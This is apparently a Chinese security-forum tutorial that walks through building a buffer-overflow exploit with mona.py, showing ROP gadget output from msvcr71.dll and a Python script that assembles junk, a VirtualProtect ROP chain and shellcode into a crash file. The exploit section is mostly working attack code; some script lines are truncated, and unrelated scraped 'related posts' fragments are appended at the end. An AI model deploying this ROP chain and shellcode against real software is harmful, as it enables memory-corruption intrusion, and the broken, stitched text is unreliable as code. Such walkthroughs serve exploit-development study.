"%u272f%u7c34" + // 0x7c34272f : ,# POP EDI # RETN [msvcr71.dll]
"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [msvcr71.dll]
"%u2b3e%u7c36" + // 0x7c362b3e : ,# POP ESI # RETN [msvcr71.dll]
"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [msvcr71.dll]
"%u582e%u7c37" + // 0x7c37582e : ,# POP EAX # RETN [msvcr71.dll]
"%ua094%u7c37" + // 0x7c37a094 : ,# ptr to &VirtualAlloc() [IAT msvcr71.dll]
"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [msvcr71.dll]
""); // :
--------------------------------------------------------------------------------------------------
ROP generator finished
[+] Preparing output file 'stackpivot.txt'
- (Re)setting logfile c:\logs\1\stackpivot.txt
[+] Writing stackpivots to file c:\logs\1\stackpivot.txt
Wrote 758 pivots to file
[+] Preparing output file 'rop_suggestions.txt'
- (Re)setting logfile c:\logs\1\rop_suggestions.txt
[+] Writing suggestions to file c:\logs\1\rop_suggestions.txt
Wrote 656 suggestions to file
[+] Preparing output file 'rop.txt'
- (Re)setting logfile c:\logs\1\rop.txt
[+] Writing results to file c:\logs\1\rop.txt (2703 interesting gadgets)
Wrote 2703 interesting gadgets to file
[+] Writing other gadgets to file c:\logs\1\rop.txt (3854 gadgets)
Wrote 3854 other gadgets to file
Done
[+] This mona.py action took 0:01:15.248000
看到没有 mona 给我们找到了 ROP链, 没有0x00 ,各种版本的代码,我们把python的copy下来
0x07 组装 ROP的exploit
我测试了下上面给的 rop链不对。 看来忽略了坏字节
再试了下坏字节,还是不好用看来不行,直接用 corelan团队的 ROP吧 !
# -*- coding: utf-8 -*-
import struct
def little_endian(address):
return struct.pack("
exploit = ""
junk = "A"*128
#eip = little_endian(0x7c345c30) #0x7c345c30
#nops = "\x90"*20
shellcode = ""
shellcode +="\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
shellcode +="\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
shellcode +="\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
shellcode +="\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
shellcode +="\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
shellcode +="\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
shellcode +="\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
shellcode +="\x49\x0b\x31\xc0\x51\x50\xff\xd7"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff,# Value to negate, will become 0x00000201 (dwSize)
0x7c347f98,# RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2,# JMP [EAX] [msvcr71.dll]
0xffffffff,#
0x7c376402,# skip 4 bytes [msvcr71.dll]
0x7c351e05,# NEG EAX # RETN [msvcr71.dll]
0x7c345255,# INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87,# POP EDX # RETN [msvcr71.dll]
0xffffffc0,# Value to negate, will become 0x00000040
0x7c351eb1,# NEG EDX # RETN [msvcr71.dll]
0x7c34d201,# POP ECX # RETN [msvcr71.dll]
0x7c38b001,# &Writable location [msvcr71.dll]
0x7c347f97,# POP EAX # RETN [msvcr71.dll]
0x7c37a151,# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81,# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30,# ptr to 'push esp # ret ' [msvcr71.dll]
]
return ''.join(struct.pack('
rop_chain = create_rop_chain()
exploit = junk + rop_chain + shellcode
#写文件
try:
rst= open("crash.txt",'w')
rst.write(exploit)
rst.close()
print "OK"
except:
print "Error"
这样就OK了,我就不上图了。。。
上传的附件:
1.PNG
(2.57kb,2次下载)
2.PNG
(2.08kb,1次下载)
3.PNG
(16.53kb,3次下载)
4.PNG
(6.19kb,1次下载)
5.PNG
(69.08kb,3次下载)
6.PNG
(26.72kb,3次下载)
174.127.195.210/bbs/index.php?,[漏洞exploit工具-mona系列4] mona实战系列相关推荐
- 174.127.195.210/bbs/index.php?,智能路由模式,uwp无法联网
uwp无法联网+1,智能路由日志如下 Mar 18 18:30:01.710 - [DEBUG] host:avatars0.githubusercontent.com:443 do gae Mar ...
- 174.127.195.176/bbs/index.php,[原创]一次逆向fb寻找密码的记录及还原相关算法
看见了这几个网址,点进去,再用ida打开,找到相关函数f5. signed int __thiscall sub_406540(void *this, int a2) { int v2; // ebx ...
- mysql漏洞扫描工具_Rad爬虫结合W13Scan扫描器挖掘漏洞
一.背景 这几天一直在研究W13Scan漏洞扫描器,因为对Python不是太熟悉,所以进度有点慢,一直没看懂怎么将代理请求的数据转发到扫描队列中去,决定先熟悉熟悉这个功能再说:Rad爬虫最近比较火,于 ...
- java web 漏洞扫描工具_java编写web漏洞扫描系列 一、GET/POST
今天是java编写漏洞扫描工具系列一,在整个系列中我将以案例驱动方式进行,从基本的请求,到常规漏洞扫描,Burp插件,调用SQLmap api,整合burp+sqlmap(Web平台),漏洞扫描平台( ...
- node/js 漏洞_6个可用于检查Node.js中漏洞的工具
node/js 漏洞 Vulnerabilities can exist in all products. The larger your software grows, the greater th ...
- 最好用的17个安全漏洞检查工具
2019独角兽企业重金招聘Python工程师标准>>> 渗透测试,是专业安全人员为找出系统中的漏洞而进行的操作.当然,是在恶意黑客找到这些漏洞之前.而这些业内安全专家各自钟爱的工具各 ...
- 常见漏洞扫描工具AWVS、AppScan、Nessus的使用
HVV笔记--常见漏洞扫描工具AWVS.AppScan.Nessus的使用 1 AWVS 1.1 安装部署 1.2 激活 1.3 登录 1.4 扫描web应用程序 1.4.1 需要账户密码登录的扫描 ...
- s2 安恒 漏洞验证工具_Struts2漏洞检查工具2018版(最新版)V2.0[带批量功能]
2018-08-24: 增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定版本没有看到有 ...
- 一款以Python编码的自动化大规模漏洞测试工具
可能大家之前已经使用过AutpSploit这款自动化漏洞利用工具了,但是这款工具现在又进行了大幅度改进. AutoSploit= Shodan/Censys/Zoomeye + Metasploit ...
最新文章
- R语言使用aov函数进行单因素协方差分析(One-way ANCOVA)、使用multcomp包的glht函数检验组均值之间所有成对对比差异、通过contrast参数自定义对比组进行组间两两方差分析
- php中条件查询语句,thinkphp3.2框架中where条件查询用法总结
- Docker挂载主机目录Docker访问出现Permission denied的解决办法
- Jenkins学习七:Jenkins的授权和访问控制
- 《C语言及程序设计》程序填空——字符数组与字符串处理
- 云原生ASP.NET Core程序的可监测性和可观察性
- 线段树-楼房重建-洛谷-P4198
- 最优二叉查找树(动态规划)——详解
- ODAC(V9.5.15) 学习笔记(四)TCustomDADataSet(1)
- EBS 常用 SQL
- 「leetcode」135.分发糖果【贪心算法】详细图解
- tomcat stdout文件快速增长原因_Tomcat下载安装及配置
- 电大与152双向数据同步的方案
- 全面Severless化只需7天!看南瓜电影的云上极速升级
- “乘风破浪”的芒果超媒,能上岸吗?
- 程序员时间管理-番茄工作法
- bitcscs计算机系统,深入理解计算机系统CSAPP-美-布莱恩特
- 无线遥控开关 开关和遥控器配对学习
- 强化学习 Sarsa 实战GYM下的CliffWalking爬悬崖游戏
- 在linux服务器上部署禅道环境